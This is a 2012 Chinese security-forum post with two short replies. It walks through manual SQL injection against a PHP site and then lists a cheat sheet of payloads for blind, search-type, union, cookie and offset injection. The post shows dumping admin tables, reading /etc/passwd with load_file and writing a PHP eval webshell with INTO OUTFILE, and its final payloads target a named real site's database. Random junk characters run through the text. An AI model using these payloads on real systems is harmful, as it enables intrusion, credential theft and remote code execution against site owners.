找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2979|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~4 k- ?7 D+ u0 s5 k. G- W3 f$ g
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?- [' s. T" K/ |: o- P7 o6 ^
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
0 v% w% h2 i! X# H0 J如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
* H# d0 ~4 y: n  V3 N( N4 L5 A1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
  k7 ^5 e( H$ O& V这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:3 C; W- {% q) _" \1 |# B
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in& p, C/ L% j7 s
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入: T8 ^8 d5 d' g8 T( K: B
                        
6 Z1 P5 v0 M2 ?2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
3 D  `  T" [1 [, X% m3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意& `/ ~# @3 e: k+ b; X$ m! `0 F
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息) Z6 h6 E0 ]! b  K6 }  V
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。( F! d0 P9 ~3 e% o1 p
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
+ r9 \# l7 Q" r0 }9 n2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
5 Y5 k) t2 A- _0 Q我就用的是第二个思路,
( S4 l( B* x- Q, t. P提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  / ^- P% B3 i/ B9 ]% c: o' v
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,4 S' n" x  B% ?. z& ]9 z
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--' ^" s8 B9 m. q* d3 j' F- n6 e
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
1 |5 l* j) s3 q" n+ @; t; ~8 `9 V7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
6 N3 v. a- D+ ]* q* u是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
* K% ^0 N$ U+ r7 e8 _( s, |* K提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --+ |4 D0 L/ F5 c9 O$ O
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
( `9 M3 A# t: T: u. F调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......: z( ~! i0 h0 t) K$ P
下面是一些很普遍注入方式资料:
- I6 o# F) M- I# d& w注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='% H1 ~6 d( r! {4 P
拆半法
7 q" _& l( G% a4 S######################################, k: J9 E" s# d! ~
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。8 H; Q% z9 u: L; C, l" A
and exists (select * from admin)+ B5 _- S1 I% U- T% N
and exists(select id from admin)0 J1 ]) @. B, @" e$ l4 g. J
and exists(select id from admin where id=1)
$ r0 V3 D, V- W- L1 r9 g% cand exists(select id from admin where id>1) 8 n8 y# O+ _/ _# |9 i
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 6 m- q$ Z2 G& ^# u  A: E
and exists (select username from admin)# O1 u& c, n: t
and exists (select password from admin)
4 R! x( r5 w) n2 Q6 Q1 Pand exists (select id from admin where len(username)<10 and id=1)8 o2 x% u6 V5 u: O4 x  Y3 G" E
and exists (select id from admin where len(username)>5 and id=1)4 u) X, s3 G9 n  p& b0 I% @
and exists (select id from admin where len(username)=6 and id=1)
; f' P7 m* m1 @2 B5 pand exists (select id from admin where len(password)<10 and id=1)
2 [% U! I: `/ \1 J" b" wand exists (select id from admin where len(password)>5 and id=1)
6 |5 \" `# ]* F0 r$ x; l; v7 land exists (select id from admin where len(password)=7 and id=1); M4 `+ q) ^6 S: r' w; a. q3 o" C
and (select top 1 asc(mid(username,1,1)) from admin)=97- R' y/ ^5 |" F- x% Z. o& b% T8 y
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。* ^- ^+ a, B4 x8 \6 |3 {0 \
猜第二位把username,1,1改成username,2,1就可以了。* v3 M3 l: D: H- C  I$ m  B
猜密码把username改成password就OK了
& ]1 m6 h( M, T6 V7 d" p##################################################% F9 V5 E7 _' N' R$ m/ r
搜索型注入
; e4 U9 i2 B/ o4 ?9 G( ^& O- ]$ a##################################
! r+ B9 p2 V  Q3 j%' and 1=1 and '%'='
( N: i- h3 _1 B% O) n%' and exists (select * from admin) and '%'='5 a* b* o+ |. G0 \
%' and exists(select id from admin where id=1) and '%'='1 J- L- d, u) Z/ W4 a4 }! S) Q* `
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='+ j; F" k- [0 q
%' and exists (select id from admin where len(password)=7 and id=1) and '%'=': x( h. y  b3 L2 z
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
5 n* n' A6 `& s6 t这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='! Z# ]  H7 B7 e1 ^- m; T& {5 x
对于MSSQL数据库,后面可以吧 and '%'='换成--; h7 [7 N* a. w1 @4 T1 m
还有一点搜索型注入也可以使用union语句。
+ {1 h2 |9 f* p########################################################
, f! d- o6 i. @' w8 u: J% _联合查询。: T% Y) E7 o  a- ?; m: \5 p
#####################################! r+ g$ W* Y' P3 R2 k% u
order by 10* w- m, {! M9 J% ~  P5 A
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
/ {) J1 @, K( Cand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin) W, X" V, ?4 L5 y8 H" x+ S; J
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1( S  |& ~4 ]" F. z. q! @) u
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)' l: |8 G; f) B2 \5 P$ [- e7 S1 R
###################################
2 q; S* i) k' [  ?* f. Xcookie注入
. M. D$ W/ n( r###############################
6 ^" d2 F6 x+ rhttp://www.******.com/shownews.asp?id=127
6 v- h) m. X( n$ zhttp://www.******.com/shownews.asp
4 t7 _7 |9 I2 H1 S" l% {8 k  zalert(="id="+escape("127"));
6 h" j1 i5 u1 b1 ]+ G  R1 Z/ Dalert(="id="+escape("127 and 1=1"));4 }/ I9 [, k# b+ q3 s3 p8 a9 V2 X
alert(="id="+escape("127 order by 10"));0 D$ S8 Z8 E$ T7 E9 L. a
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
5 L; R5 a1 f# e# Y) O7 {alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));$ }7 @0 N- f- M! p: b9 ~5 w2 @, ^
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
1 N0 E$ t* I' \# t3 v###################################
- j$ S2 B2 P" n" j偏移注入
4 w5 ~0 w, o4 ^1 K1 N. ^###########################################################6 ]. q; N% ^# k3 F  i& ^6 z
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin3 s, h$ s6 L: P1 R' i* E( W! P
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin" G$ x* _( j$ W1 r& n* K
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
' O# u1 x! \/ J! ?+ {* N0 l2 N+ E" gunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
2 V3 y* l# B: P+ l; V$ t2 T$ Tunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)+ Y8 \% q7 o/ k# a
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
( ~& k* m3 k2 j& c) Q6 Q+ _6 Aunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
8 A" s4 R: y4 ^$ X" `% R9 [6 Ca.id=d.id)
' M5 L+ x! Q( |" y0 w+ \) _" Aand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
3 C6 a6 @0 e8 V* |* Qand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
' S; _; g, K3 `8 u; P- F  8 k5 W5 l# t. U0 ?9 j! u8 R
============================================================================================================4 V5 _3 v% w* D
1.判断版本
( Y$ g% t& `* z0 p. Gand ord(mid(version(),1,1))>51
2 m4 k1 A% R" Q3 N; ?5 ?返回正常,说明大于4.0版本,支持ounion查询' }; @+ B2 [1 C, q  X8 T4 x
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解' m: B2 i! T5 N! Y4 F8 n# k# \
and 2=4 union select 1,2,3,4,5,6,7,8,9--2 I7 Y+ {% ^: w5 r' j
3.查看数据库版本及当前用户,
: N! Z: c7 X6 e- Mand 2=4 union select 1,user(),version(),4,5,6,7,8,9--6 z0 t& ^. ?% }- Q; o5 c
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,  c  L* i6 |0 e. l( i9 U
4.判断有没有写权限( e) G5 X! Q2 P8 q: n
and (select count(*) from MySQL.user)>0-- ! ?2 S" I# i7 J( m6 I+ z& I9 Y9 ]
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
* p* }8 u0 ]& F用不了这个命令,就学习土耳其黑客手法,如下
; v' t5 P( @  R; g7 L' Yand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--& \  t! z. V( i5 r6 X
6.爆表,爆库* A- a0 d9 j2 K2 A2 i3 u/ i# `. n
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
, D/ [2 n( @' E. `' P7.爆列名,爆表- O! E) D3 J6 P
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
. z1 F! S; [4 a8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
1 M! W" _0 m  z" C7 T7 X" {. Gand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--2 }% G8 b! c3 O5 i
9.爆字段内容" b4 |  M& y  Q! q/ g- {. D
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
& `" ]3 H  Q' {' g, Yhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表